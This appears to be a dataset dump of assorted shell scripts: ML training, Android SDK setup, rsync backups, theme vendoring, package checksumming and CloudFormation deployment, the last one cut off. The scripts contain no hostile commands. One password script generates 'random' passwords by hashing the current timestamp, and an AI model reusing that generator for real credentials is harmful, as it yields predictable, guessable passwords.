blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
5e0d5f409e04d286878c43feb01928df385ff923
|
Shell
|
sjoon-oh/dlrm-debloat
|
/train_kaggle.sh
|
UTF-8
| 1,110
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# DLRM Facebookresearch Debloating
# author: sjoon-oh @ Github
# source: dlrm/our_train.py
#
# Train the debloated DLRM model on the Criteo Kaggle dataset.
# Raw data is expected at ${dataset_dir}/train.txt; the preprocessed
# cache is written to ${dataset_proc_dir}/kaggle.npz.

# Deliberately left unquoted at the call site so the interpreter and
# the script name split into separate words.
dlrm_pt_bin="python3 dlrm_run.py"

dataset_base_dir="dataset"
dataset_dir="${dataset_base_dir}/Kaggle"
dataset_proc_base_dir="dataset-processed"
dataset_proc_dir="${dataset_proc_base_dir}/Kaggle"

# mkdir -p creates missing parents and is a no-op when the directory
# already exists; the original unguarded mkdir pair printed an error
# whenever only one of the two levels was present.
mkdir -p "${dataset_dir}"
mkdir -p "${dataset_proc_dir}"
# --save-model below writes into model/, which must exist.
mkdir -p model

echo "run script (pytorch) ..."
$dlrm_pt_bin \
--arch-sparse-feature-size=16 \
--arch-mlp-bot="13-512-256-64-16" \
--arch-mlp-top="512-256-1" \
--raw-data-file="${dataset_dir}/train.txt" \
--processed-data-file="${dataset_proc_dir}/kaggle.npz" \
--loss-function=bce \
--round-targets=True \
--learning-rate=0.1 \
--mini-batch-size=128 \
--print-freq=1024 \
--test-freq=16384 \
--print-time \
--test-mini-batch-size=16384 \
--test-num-workers=2 \
--save-model="model/model-kaggle.pt" \
--den-feature-num=13 \
--cat-feature-num=26
echo "done"
| true
|
1ac43d1e6130a2a8546dbc385d49f37d6bae9b1b
|
Shell
|
theneva/pqrs.org
|
/themes/update.sh
|
UTF-8
| 423
| 3.1875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# Refresh the vendored docsy theme: re-clone it, record the HEAD
# revision of the checkout and of every submodule into docsy-revisions,
# then strip all .git metadata and the userguide from the tree.
set -u
basedir=$(dirname "$0")
# Abort if we cannot reach the script's own directory; everything below
# is relative to it.
cd "$basedir" || exit 1
rm -fr docsy
git clone --recursive --shallow-submodules --depth 1 https://github.com/google/docsy.git
rm -f docsy-revisions
# One ".git" entry exists for the main checkout and one per submodule
# (a directory or a gitlink file, respectively).
find docsy -name '.git' | while IFS= read -r d; do
  printf '%s: ' "$d" >> docsy-revisions
  (cd "$(dirname "$d")" && git rev-parse HEAD) >> docsy-revisions
done
# Drop the git metadata so only the theme sources remain vendored.
find docsy -name '.git' | while IFS= read -r d; do
  rm -fr "$d"
done
rm -fr docsy/userguide
| true
|
dc5ff76476671e330172dbad8c7638091ad9342f
|
Shell
|
gleandroj/docker-laravel
|
/scripts/android.sh
|
UTF-8
| 3,303
| 2.890625
| 3
|
[] |
no_license
|
# Provision an Android build environment under /opt: Gradle, the
# Android SDK (platform/build tools, support repos), the NDK, and
# Android CMake.  Meant to run as root in a Debian/Ubuntu container.
export SDK_HOME=/opt
apt-get --quiet update --yes
apt-get --quiet install --yes wget tar unzip lib32stdc++6 lib32z1 git --no-install-recommends
# NOTE(review): the downloads below use curl, but only wget is
# installed above -- confirm curl exists in the base image.
# Gradle
export GRADLE_VERSION=4.1
export GRADLE_SDK_URL=https://services.gradle.org/distributions/gradle-${GRADLE_VERSION}-bin.zip
curl -sSL "${GRADLE_SDK_URL}" -o gradle-${GRADLE_VERSION}-bin.zip \
&& unzip gradle-${GRADLE_VERSION}-bin.zip -d ${SDK_HOME} \
&& rm -rf gradle-${GRADLE_VERSION}-bin.zip
export GRADLE_HOME=${SDK_HOME}/gradle-${GRADLE_VERSION}
export PATH=${GRADLE_HOME}/bin:$PATH
# android sdk|build-tools|image
# NOTE(review): ANDROID_IMAGES lists the same system image twice --
# one entry was probably meant to differ.
export ANDROID_TARGET_SDK="android-28" \
ANDROID_BUILD_TOOLS="27.0.3" \
ANDROID_SDK_TOOLS="3859397" \
ANDROID_IMAGES="sys-img-armeabi-v7a-android-28,sys-img-armeabi-v7a-android-28"
export ANDROID_SDK_URL=https://dl.google.com/android/repository/sdk-tools-linux-${ANDROID_SDK_TOOLS}.zip
curl -sSL "${ANDROID_SDK_URL}" -o android-sdk-linux.zip \
&& unzip android-sdk-linux.zip -d ${SDK_HOME}/android-sdk \
&& rm -rf android-sdk-linux.zip
# Set ANDROID_HOME
export ANDROID_HOME=${SDK_HOME}/android-sdk
export PATH=${ANDROID_HOME}/tools:${ANDROID_HOME}/platform-tools:$PATH
# licenses
# Pre-accept the SDK license agreements by writing their hashes, so the
# sdkmanager runs below stay non-interactive.
mkdir $ANDROID_HOME/licenses
echo 8933bad161af4178b1185d1a37fbf41ea5269c55 > $ANDROID_HOME/licenses/android-sdk-license
echo d56f5187479451eabf01fb78af6dfcb131a6481e >> $ANDROID_HOME/licenses/android-sdk-license
echo 24333f8a63b6825ea9c5514f83c2829b004d1fee >> $ANDROID_HOME/licenses/android-sdk-license
echo 84831b9409646a918e30573bab4c9c91346d8abd > $ANDROID_HOME/licenses/android-sdk-preview-license
# Update and install using sdkmanager
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "tools" "platform-tools"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "build-tools;${ANDROID_BUILD_TOOLS}"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "platforms;${ANDROID_TARGET_SDK}"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "extras;android;m2repository" "extras;google;google_play_services" "extras;google;m2repository"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "extras;m2repository;com;android;support;constraint;constraint-layout;1.0.2"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "extras;m2repository;com;android;support;constraint;constraint-layout-solver;1.0.2"
# android ndk
export ANDROID_NDK_VERSION=r16b
# NOTE(review): plain http URL -- https is available on dl.google.com.
export ANDROID_NDK_URL=http://dl.google.com/android/repository/android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip
curl -L "${ANDROID_NDK_URL}" -o android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip \
&& unzip android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip -d ${SDK_HOME} \
&& rm -rf android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip
export ANDROID_NDK_HOME=${SDK_HOME}/android-ndk-${ANDROID_NDK_VERSION}
export PATH=${ANDROID_NDK_HOME}:$PATH
chmod u+x ${ANDROID_NDK_HOME}/ -R
# Android CMake
wget -q https://dl.google.com/android/repository/cmake-3.6.3155560-linux-x86_64.zip -O android-cmake.zip
unzip -q android-cmake.zip -d ${ANDROID_HOME}/cmake
export PATH=${PATH}:${ANDROID_HOME}/cmake/bin
chmod u+x ${ANDROID_HOME}/cmake/bin/ -R
rm -rf android-cmake.zip
#android-wait-for-emulator
#curl https://raw.githubusercontent.com/Cangol/android-gradle-docker/master/android-wait-for-emulator -o ${SDK_HOME}/bin/android-wait-for-emulator
#chmod u+x ${SDK_HOME}/bin/android-wait-for-emulator
| true
|
e786b9b79d42864f8d309fe7fe3fadb56937a954
|
Shell
|
koert/spring-petclinic
|
/configure-petclinic.sh
|
UTF-8
| 811
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# Configure PetClinic's JDBC connection pool and datasource on a local
# Glassfish server, then shut the server down again.
SCRIPT=$(readlink -f "$0")
bin_dir=$(dirname "$SCRIPT")
root_dir=${bin_dir}/..
# Print error message to stderr and exit 1
# $1 - error message
fail() {
  echo "$1" >&2
  exit 1
}
# Call an asadmin command, aborting the whole script on failure.
# args - forwarded verbatim to asadmin
cmdAsAdmin() {
  echo "* asadmin $@"
  # "$@" (instead of the original unquoted $*) keeps each argument
  # intact even when it contains whitespace, e.g. a --property value.
  asadmin --user admin --passwordfile "${root_dir}/config/admin-password" "$@" || fail "asadmin command failed"
}
echo "=> Start Glassfish server"
asadmin start-domain
echo "=> Create datasource"
cmdAsAdmin create-jdbc-connection-pool --restype=javax.sql.DataSource --datasourceclassname=org.hsqldb.jdbc.JDBCDataSource \
  --property "user=sa:password=sa:url=jdbc\:hsqldb\:hsql\:mem\:petclinic" \
  PetClinicPool
cmdAsAdmin create-jdbc-resource --connectionpoolid PetClinicPool jdbc/petclinic
echo "=> Stop Glassfish server"
asadmin stop-domain
| true
|
dd3afa2d6dd0c868557dbeab8213c09213e66a83
|
Shell
|
bohunicka14/Linux-scripts
|
/heslo.sh
|
UTF-8
| 564
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# Password ("heslo") demo script:
#  1) validate the password passed as $1 (length, character classes),
#  2) show several ways of generating a random password,
#  3) hash the generated password with bcrypt via htpasswd.
heslo=$1
echo $heslo
# Warn when 5 characters or fewer ("Kratke heslo" = short password).
if [ ${#heslo} -le 5 ]
then
echo Kratke heslo
fi
# "OK" only when it contains a digit, a lowercase and an uppercase
# letter ("Heslo (nie) je OK" = password is (not) OK).
if [[ $heslo =~ [0-9] && $heslo =~ [a-z] && $heslo =~ [A-Z] ]]
then
echo Heslo je OK
else
echo Heslo nie je OK
fi
#==================================================================
# Generator examples; each assignment overwrites the previous one, so
# only the final value (18 base64 chars of sha256(date)) is used below.
# NOTE(review): date +%s is predictable -- the commented-out
# od /dev/urandom variant at the bottom is the stronger source.
heslo=$(pwgen 12 1)
heslo=$(date +%s | md5sum)
heslo=$(date +%s | sha256sum)
heslo=$(date +%s | sha256sum | base64)
heslo=$(date +%s | sha256sum | base64 | head -c 18)
echo $heslo
# bcrypt hash, cost factor 10, empty username (leading ":" in output).
hash=$(htpasswd -bnBC 10 "" $heslo)
echo $hash
# od -An -N8 -to8 /dev/urandom | sha256sum | base64 | head -c 18
| true
|
d69c18a850b00f7b4ef06cd748242fd46d8ad1ea
|
Shell
|
jinyx728/CS229
|
/data_generation/script/process-subdiv.sh
|
UTF-8
| 661
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/sh
######################################################################
# Copyright 2019. Yongxu Jin.
# This file is part of PhysBAM whose distribution is governed by the license contained in the accompanying file PHYSBAM_COPYRIGHT.txt.
######################################################################
# Subdivide every predicted cloth mesh frame (00000000..00000495) and
# write the textured result next to the ground-truth UVs.
# (Fix: the shebang must be the first line of the file to take effect;
# it previously sat below the copyright banner.)
# cloth model path
PREDICT_NEW_PATH=/phoenix/yxjin/test_infer/mocap_13_30
OUTDIR=/phoenix/yxjin
# -p: succeed even when the output directory already exists.
mkdir -p "$OUTDIR/mocap_13_30_subdiv/"
for INDEX in $(seq -f "%08g" 0 495)
do
    python subdivision.py -i "$PREDICT_NEW_PATH/$INDEX.obj" -o "$OUTDIR/mocap_13_30_subdiv/pd_div_${INDEX}_tex.obj" -t ../vt_groundtruth.txt
    echo "generated data $INDEX"
done
| true
|
922c69c0943d067bccc3ae0f8f1eec3b7b47a025
|
Shell
|
maxxtepper/bin
|
/root/rsbak_v2
|
UTF-8
| 12,480
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
# Script to back up the home directory using rsync
# COMPLETE: This is to do a complete backup. The procedure will simply create a new directory
# dated with the current time and do a full backup of the /home/maxx/
#============================================================================================================
################################## Variables #########################################################
#============================================================================================================
# _complete : /backup/rsync/home/maxx/_home_maxx.$_NOW.complete
# _complete_parent: /backup/rsync/home/maxx/_home_maxx.$_NOW.complete/_home_maxx.$_NOW.parent
# The complete_parent directory will be created independent of anything else when a complete backup is desired
# _partial: $_complete/_home_maxx.$_NOW
# The partial directory will be created, but inside of the most recent complete directory, and linked to the parent directory
# in that complete directory
# Read the file in parameter and fill the array named "array"
# Fill the global array "array" with the lines of the file named by $1.
# IFS= plus read -r keeps every line byte-for-byte (leading/trailing
# whitespace and backslashes are preserved).
getArray() {
  array=()
  while IFS= read -r line; do
    array+=("$line")
  done < "$1"
}
# Call the function on the pre-defined file and name and scheme
getArray "config_rsbak.txt"
# Print the file (echo each element of the array)
for e in "${array[@]}"; do
  echo "$e"
done
# IMPORTANT NOTE
# I am going to write a script that runs this script for multiple systems at scheduled times and days, with a specific scheme in mind: a complete will be done every 30 days, and a partial is day everyday there is not a complete. Then, a full complete, with all of its partial data, can be compressed and stored for long-term use.
_NOW=$(date +"%y%m%d_%H%M%S")
# BUG FIX: bash array subscripts need braces -- the original $array[1]
# expanded to the FIRST element followed by the literal text "[1]".
# NOTE(review): bash arrays are 0-based, so indices 1..3 skip the first
# config line -- confirm against the layout of config_rsbak.txt.
# Read in, from a file, names for what to backup...
_HOME_IN=${array[1]}
# ...and where to back it up
_HOME_COM=${array[2]}
# The ID
_HOME_ID=${array[3]}
# Generic working variables, filled in by rsync_backup()/rsync_type().
_bak_in=
_bak_com=
_bak_id=
_complete=
_complete_parent=
# To setup the backup
_bak_type=
_bak_log=
# For excludes
_HOME_EXC="$_HOME_COM/.excludes.txt"
_bak_exc_tmp=
_bak_exc=
_incomplete=
_destination=
#============================================================================================================
################################## Functions ##########################################################
#============================================================================================================
# Copy the per-target configuration into the generic working variables:
# given a prefix in $1 (e.g. "_HOME"), set _bak_in/_bak_com/_bak_id/
# _bak_exc_tmp from $<prefix>_IN/_COM/_ID/_EXC.
# eval performs the variable-name indirection; $1 is a fixed literal
# supplied by the option parser, so no external input reaches eval.
rsync_backup() {
eval _bak_in=\$${1}_IN
eval _bak_com=\$${1}_COM
eval _bak_id=\$${1}_ID
eval _bak_exc_tmp=\$${1}_EXC
echo "_bak_com set to $_bak_com"
}
# Echo the newest complete-backup directory under $_bak_com.  Directory
# names embed the $_NOW timestamp, so the last entry of the (sorted)
# find output is the most recent one.
# NOTE(review): relies on word-splitting of find's output -- breaks on
# paths that contain whitespace.
find_complete() {
ls_array=( $(find $_bak_com/_* -maxdepth 0 -type d) )
ls_last=${#ls_array[@]}
_complete=${ls_array[$ls_last -1]}
# Echo out complete for _bak_com
echo "$_complete"
}
# Echo the newest "*.parent" directory under $_bak_com -- the snapshot
# that rsync_commence later passes to rsync as --link-dest.
# NOTE(review): same word-splitting caveat as find_complete.
find_complete_parent() {
ls_array=( $(find $_bak_com/_*.parent -maxdepth 0 -type d) )
ls_last=${#ls_array[@]}
_complete_parent=${ls_array[$ls_last -1]}
echo "$_complete_parent"
}
# Record the backup mode ($1: "partial" or "complete") and derive the
# working directory plus log/excludes locations from it:
#   partial  -> work inside the newest existing complete directory,
#   complete -> build a fresh timestamped *.complete directory name.
rsync_type() {
_bak_type=$1
if [ $_bak_type = "partial" ]; then
_complete=$(find_complete)
_bak_com=$_complete
_complete_parent=$(find_complete_parent)
echo "_complete_parent=$_complete_parent"
echo "rsync_type --> partial"
elif [ $_bak_type = "complete" ]; then
_bak_com=$_bak_com/"$_bak_id"."$_NOW".complete
echo "rsync_type --> complete"
fi
# Logs and the copied excludes list always live inside _bak_com.
_bak_exc="$_bak_com/excludes"
_bak_log="$_bak_com/log_files"
}
# Print "yes" when $1 names an existing directory, "no" otherwise.
# Used by rsync_prep to verify the layout before a partial backup.
check_directory() {
  if [[ -d "$1" ]]; then
    echo "yes"
  else
    echo "no"
  fi
}
# Build the final directory/file names for this run and ensure they
# exist: created for a complete backup, merely verified (via
# check_directory) for a partial one.  On return _incomplete,
# _destination, _bak_log and _bak_exc hold the run-specific paths, and
# the excludes template has been copied into place.
rsync_prep() {
# Check complete or partial
# ~~~~~COMPLETE~~~~~
if [ "$_bak_type" = "complete" ]; then
# Prepare final names for directories and files
_incomplete=$_bak_com/"$_bak_id".incomplete
_destination=$_bak_com/"$_bak_id"."$_NOW".parent
_complete_parent=$_bak_com
echo "_incomplete=$_incomplete"
echo "_destination=$_destination"
# Make necessary directories
echo "Making directory $_incomplete"
sudo mkdir -p "$_incomplete"
# sudo chmod 755 $_bak_com
echo "Making directory $_bak_com"
sudo mkdir -p "$_bak_com"
# sudo chmod 755 $_bak_com
echo "Making directory $_bak_log"
sudo mkdir -p "$_bak_log"
# sudo chmod 755 $_bak_log
# From here on _bak_log names the run's log FILE inside the directory.
_bak_log=$_bak_log/"$_bak_id"_"$_NOW.log"
echo "Making directory $_bak_exc"
sudo mkdir -p "$_bak_exc"
# sudo chmod 755 $_bak_exc
# Likewise _bak_exc now names this run's excludes FILE.
_bak_exc=$_bak_exc/"$_bak_id"_"$_NOW"_excludes.txt
echo "_bak_exc=$_bak_exc"
if [ -f $_bak_exc_tmp ]; then
echo "_bak_exc_tmp exists!!: $_bak_exc_tmp"
fi
echo "Copying excludes.txt into excludes"
sudo cp $_bak_exc_tmp $_bak_exc
# ~~~~~PARTIAL~~~~~
elif [ "$_bak_type" = "partial" ]; then
# Look for necessary directories to make sure they exist; a missing one
# means no complete backup exists yet (usage 2 explains that).
echo "Sending _bak_com=$_bak_com to check_directory"
if [ "$(check_directory $_bak_com)" = "yes" ]; then
echo "Found $_bak_com?.....yes"
else
echo "Found $_bak_com?.....no"
usage 2
exit 1
fi
if [ "$(check_directory "$_bak_log")" = "yes" ]; then
echo "Found $_bak_log?.....yes"
_bak_log=$_bak_log/"$_bak_id"_"$_NOW".log
else
echo "Found $_bak_log?.....no"
usage 2
exit 1
fi
if [ "$(check_directory "$_bak_exc")" = "yes" ]; then
echo "Found $_bak_exc?.....yes"
_bak_exc=$_bak_exc/"$_bak_id"_"$_NOW"_excludes.txt
else
echo "Found $_bak_exc?.....no"
usage 2
exit 1
fi
echo "Copying excludes.txt into excludes"
sudo cp $_bak_exc_tmp $_bak_exc
# Prepare final names for directories and files
_incomplete=$_bak_com/"$_bak_id".incomplete
_destination=$_bak_com/"$_bak_id".$_NOW
fi
}
# Run the actual rsync into the *.incomplete staging directory, then
# rename it to its final name -- so only finished backups ever carry a
# real (timestamped) name.  --link-dest hard-links unchanged files
# against the last complete backup's parent snapshot.
# NOTE(review): unquoted expansions assume no whitespace in any path.
rsync_commence() {
# Now make the backup
echo "The backup is being made"
#rsync --archive --info=progress2 --one-file-system --hard-links --human-readable --inplace --numeric-ids --delete --delete-excluded --log-file=$_bak_log --exclude-from=$_bak_exc --link-dest=$_complete_parent $_bak_in $_incomplete
rsync --archive --recursive --compress --info=progress2 --one-file-system --links --perms --executability --hard-links --times --human-readable --inplace --numeric-ids --delete --delete-excluded --log-file=$_bak_log --exclude-from=$_bak_exc --link-dest=$_complete_parent $_bak_in $_incomplete
# After completion
sudo mv $_incomplete $_destination
}
# Print a help or error message selected by the numeric code in $1:
#   1 -> full usage text, 2 -> "no complete backup found" hint.
# Any other (or missing) code prints nothing.
usage() {
  if [ "$1" = "1" ]; then
    echo "rsbak [-what] [-type]"
    echo "-what ---> -r | --run == make backup from config file"
    echo "-type ---> -c | --complete == do a fresh complete backup"
    echo " -p | --partial == do a partial backup to the last complete backup"
    echo "example: rsbak --run --complete"
  elif [ "$1" = "2" ]; then
    echo "some directory did not exist...possible no complete exists? Try running a complete backup"
  fi
}
#============================================================================================================
################################## Main ###############################################################
#============================================================================================================
# Option loop.  Order matters: -r/--run loads the config
# (rsync_backup) and -c/-p derive their paths from it (rsync_type),
# so -r must come first, e.g. "rsbak --run --complete".
while [ "$1" != "" ]; do
case $1 in
-r | --run ) shift
rsync_backup "_HOME"
;;
-c | --complete ) shift
rsync_type "complete"
;;
-p | --partial ) shift
rsync_type "partial"
;;
* ) usage
# NOTE(review): usage is called without a message code here, so
# nothing is printed before exiting -- probably meant "usage 1".
exit 1
esac
done
# Both a mode (-c/-p) and an input (-r) must have been configured.
if [[ -n $_bak_type && -n $_bak_in ]]; then
echo "preparing rsync..."
rsync_prep $_bak_type
echo "rsync commencing: $_bak_type backup of $_bak_in"
rsync_commence
else
echo "Parameters not met!"
usage 1
exit 1
fi
echo "Backup complete!"
#===================================================================================================================================================================
#rsync --archive --one-file-system --hard-links --human-readable --inplace --numeric-ids --delete --delete-excluded --log-file="$_log_file" --exclude-from="$_excludes" --link-dest="$_complete_parent" "$_bak_what_name" "$_incomplete"
#===================================================================================================================================================================
# rsync: the command for using rsync
# --archive: This causes rsync to backup (they call it "preserve) things like file permissions, ownerships, and timestamps
# --one-file-system: This causes rsync to NOT recurse into the file systems. If you use this like I do then you must backup each file system (mount point) one at a time. The alternative is to simply backup / and exclude things you don't want to backup (like /proc, /sys, /tmp, and any network or removable media mounts)
# --hard-links: This causes rsync to maintain hard links that are on the server being backed up. This has nothing to do with the hard links used during the rotation
# --human-readable: This tells rsync to output numbers of bytes with K, M, G, or T suffices instead of just long strings of digits
# --inplace: This tells rsync to update files on the target at the block level instead of building a temporary replacement file. It is a significant performance improvement; however, it should not be used for things other than backups, or if your version of rsync is old enough that --inplace is incompatible with --link-dest
# --numeric-ids: This tells rsync to not attempt to translate UID <> userid or GID <> groupid. This is very important when doing backups and restores. If you are doing a restore from a live cd such as SystemRescueCD or Knoppix your file ownerships will be completely screwed up if you leave this out
# --delete: This tells rsync to delete files that are no longer on the server from the backup. This is less important when using --link-dest because you should be backing up to an empty directory so there would be nothing to delete however I include it because of the possibility that the *.incomplete directory I am backing up to is actually left over from a previous failed run and may have things to delete
# --delete-excluded: This tells rsync that it can delete stuff from a previous backup that is now within the excluded list
# --exclude-from=excludes.txt: This is a plain text file with a list of paths that I do not want backed up. The format of the file is simply one path per line. I tend to add things that will always be changing but are unimportant such as unimportant log and temp files. If you have a ~/.gvfs entry you should add it too as it will cause a non-fatal error
# --link-dest: This is the most recent complete backup that was current when we started. We are telling rsync to link to this backup for any files that have not changed
# /home/maxx/: This is the path on the server that is to be backed up. Note that the trailing slash IS significant
# /backup/rsync/maxx/_home_maxx.incomplete/: This is the empty directory we are going to backup to. It should be created with mkdir -p first. If the directory exists from a previous failed or aborted backup it will simply be completed. This trailing slash is not significant but I prefer to have it
# --verbose: This causes rsync to list each file that it touches
# --progress: This adds to the verbosity and tells rsync to print out a %completion and transfer speed while transferring each file
# --itemize-changes: This adds to the file list a string of characters that explains why rsync believes each file needs to be touched. See the man page for the explanation of the characters
| true
|
870b0e2ccebcaaf39ce6041cff2fa1fa11165f04
|
Shell
|
AndrewCopeland/conjur-api-go
|
/package.sh
|
UTF-8
| 417
| 3.34375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash -e
# Package the conjur-api-go sources into a tarball under output/dist
# and generate a SHA-256 checksum file next to it.
# set -e also here so the script still aborts on error when run as
# "bash package.sh" (shebang options are bypassed in that case).
set -e
echo "==> Packaging..."
rm -rf output/dist && mkdir -p output/dist
tar --exclude='./.git' --exclude='./output' -cvzf ./output/dist/conjur-api-go.tar.gz .
# # Make the checksums
echo "==> Checksumming..."
cd output/dist
# command -v is the portable replacement for `which`; output is
# discarded so only the checksum tool's output is shown.
if command -v sha256sum >/dev/null; then
  sha256sum * > SHA256SUMS.txt
elif command -v shasum >/dev/null; then
  shasum -a256 * > SHA256SUMS.txt
else
  echo "couldn't find sha256sum or shasum" >&2
  exit 1
fi
| true
|
eb9c99ec6c9650d95345f3e667e039092544d9eb
|
Shell
|
green-delver/sh-files
|
/menü.sh
|
UTF-8
| 256
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# Minimal interactive menu skeleton: offer two choices, clear the
# screen for a valid selection (the real command would go where the
# "Befehl" placeholder sits), otherwise report the input as out of
# range (German: "keyboard input not in the allowed range").
echo "1: x"
echo "2: y"
read ANTWORT
case "$ANTWORT" in
  1)
    clear
    # Befehl (command) for choice 1 goes here
    #
    exit
    ;;
  2)
    clear
    # Befehl (command) for choice 2 goes here
    #
    exit
    ;;
esac
echo "Tastatureingabe nicht im erlaubten Bereich!"
| true
|
9cfc1f3e03a4ed69af34a29e77f9c1b80bbfe6f1
|
Shell
|
rkferreira/aws
|
/cloudformation/cloudformation.sh
|
UTF-8
| 4,925
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
#####################################
## Deploy cloudformation templates
#
# Defaults used by every aws-cli call below (also shown by show_help).
# NOTE(review): "eu-usa-1" is not a standard AWS region name -- confirm
# it is not a placeholder.
REGION="eu-usa-1"
PROFILE="default"
AWSCLI="/usr/local/bin/aws"
TEMPLATES_PATH="./"
# Deploy every stack for ${ENV_NAME} in dependency order: network ->
# security groups -> IAM -> bastion -> database -> beanstalk API ->
# API gateway -> VPC link.  Runs only when -a was given; asks for a
# single y/n confirmation unless -y (YES_TO_ALL) was passed.
deploy_all () {
if [[ ! -z ${DEPLOY_ALL} ]]; then
if [[ -z ${YES_TO_ALL} ]]; then
# One confirmation covers all stacks; any answer but y/Y aborts.
read -p "I will deploy ALL stacks, are you sure? (y/n)" -n 1 -r
echo
if [[ $REPLY =~ [Yy]$ ]]; then
YES_TO_ALL='y'
else
YES_TO_ALL=''
fi
fi
if [[ ! -z ${YES_TO_ALL} ]]; then
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/base/${ENV_NAME}-networkstack.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/base/${ENV_NAME}-networkstack.yaml --stack-name ${ENV_NAME}-networkstack
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-securitygroups.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-securitygroups.yaml --stack-name ${ENV_NAME}-securitygroups
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-iam.yaml"
# IAM-touching stacks need the explicit capability acknowledgements.
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-iam.yaml --stack-name ${ENV_NAME}-iam --capabilities "CAPABILITY_IAM" "CAPABILITY_NAMED_IAM"
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-bastion.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-bastion.yaml --stack-name ${ENV_NAME}-bastion
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/db/${ENV_NAME}-database.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/db/${ENV_NAME}-database.yaml --stack-name ${ENV_NAME}-database
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-beanstalk-restdataapi.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-beanstalk-restdataapi.yaml --stack-name ${ENV_NAME}-beanstalk-restdataapi
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw.yaml --stack-name ${ENV_NAME}-apigw
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw-vpclink.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw-vpclink.yaml --stack-name ${ENV_NAME}-apigw-vpclink --capabilities "CAPABILITY_IAM" "CAPABILITY_NAMED_IAM"
fi
fi
}
# Deploy a single stack: template file from $FILE_NAME (-f), stack name
# from $STACK_NAME (-s).  Prompts for confirmation unless -y was given.
deploy_stack() {
if [[ ! -z ${STACK_NAME} && ! -z ${FILE_NAME} ]]; then
if [[ -z ${YES_TO_ALL} ]]; then
read -p "I will deploy ${FILE_NAME} with stack name as ${STACK_NAME}, are you sure? (y/n)" -n 1 -r
echo
if [[ $REPLY =~ [Yy]$ ]]; then
YES_TO_ALL='y'
else
YES_TO_ALL=''
fi
fi
if [[ ! -z ${YES_TO_ALL} ]]; then
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${FILE_NAME} --stack-name ${STACK_NAME}
fi
fi
}
# Print the usage text, including the script's current defaults
# (REGION, PROFILE, TEMPLATES_PATH are the globals defined up top).
show_help () {
  cat <<EOF
USAGE:

 # Deploy a stack as STACKNAME getting resources from FILENAME
 $0 -s STACKNAME -f FILENAME

 # Deploy ALL the files for the environment ENVNAME
 $0 -a -e ENVNAME

 Add -y for NO confirmation on deployment.
 ENVNAME is part of file path on this directory structure.

Script defaults:
 - REGION: ${REGION}
 - PROFILE: ${PROFILE}
 - TEMPLATES PATH: ${TEMPLATES_PATH}

You MUST have aws cli configured and working BEFORE trying using this.

EOF
}
#########
## Main
#
# Flag defaults; getopts fills them in below.
STACK_NAME=''
ENV_NAME=''
FILE_NAME=''
DEPLOY_ALL=''
YES_TO_ALL=''
# -h help | -s stack name | -e environment | -f template file |
# -y skip confirmation | -a deploy all stacks for the environment.
while getopts 'yhs:e:f:a' opt; do
case ${opt} in
h)
show_help
exit 0
;;
s)
STACK_NAME="$OPTARG"
;;
e)
ENV_NAME="$OPTARG"
;;
f)
FILE_NAME="$OPTARG"
;;
y)
YES_TO_ALL="y"
;;
a)
DEPLOY_ALL="y"
;;
esac
done
# -a mode needs an environment name; the functions re-check their own
# preconditions, so both modes can be requested in one invocation.
